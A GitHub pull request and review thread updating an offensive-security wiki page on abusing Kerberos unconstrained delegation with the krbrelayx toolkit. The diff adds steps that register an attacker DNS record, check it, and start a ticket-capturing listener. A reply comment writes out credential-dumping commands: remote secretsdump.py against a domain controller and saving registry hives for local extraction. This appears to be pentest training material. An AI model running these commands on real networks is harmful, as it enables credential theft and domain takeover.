### PR TITLE
Update unconstrained.md

### PR DESCRIPTION
**Pull request by A1vinSmith**
Add more steps for using the krbrelayx toolkit.

### CODE REVIEW

File: ad/movement/kerberos/delegations/unconstrained.md [hunk 1]
```diff
@@ -48,11 +48,22 @@ addspn.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOM
...
 dnstool.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'
 
-# 3. Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
+# 3. Check that the record was added successfully (< 3 minutes)
+nslookup attacker.DOMAIN_FQDN DomainController
+
+# 4. Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
+# If dump the creds locally, e.g. via secretsdump
 krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'
+# If dump the creds remotely
```
Comment (ShutdownRepo) [inline ad/movement/kerberos/delegations/unconstrained.md:57]: What do you mean by "if dump the creds localy/remotely"?

**Review by ShutdownRepo — CHANGES_REQUESTED** [review]

File: ad/movement/kerberos/delegations/unconstrained.md (hunk 1 above)
Comment (A1vinSmith) [reply ad/movement/kerberos/delegations/unconstrained.md:57]: # Remotely against the victim 
$ secretsdump.py domain/account:'Passw0rd!'@domaincontroller

To get the AES:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

# Locally that using the hive has already been dumped 
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL

**Comment by ShutdownRepo** [comment]
I modified your PR, if the changes are good with you I can merge

**Comment by A1vinSmith** [comment]
I'm good. Cheers

**Pull request merged**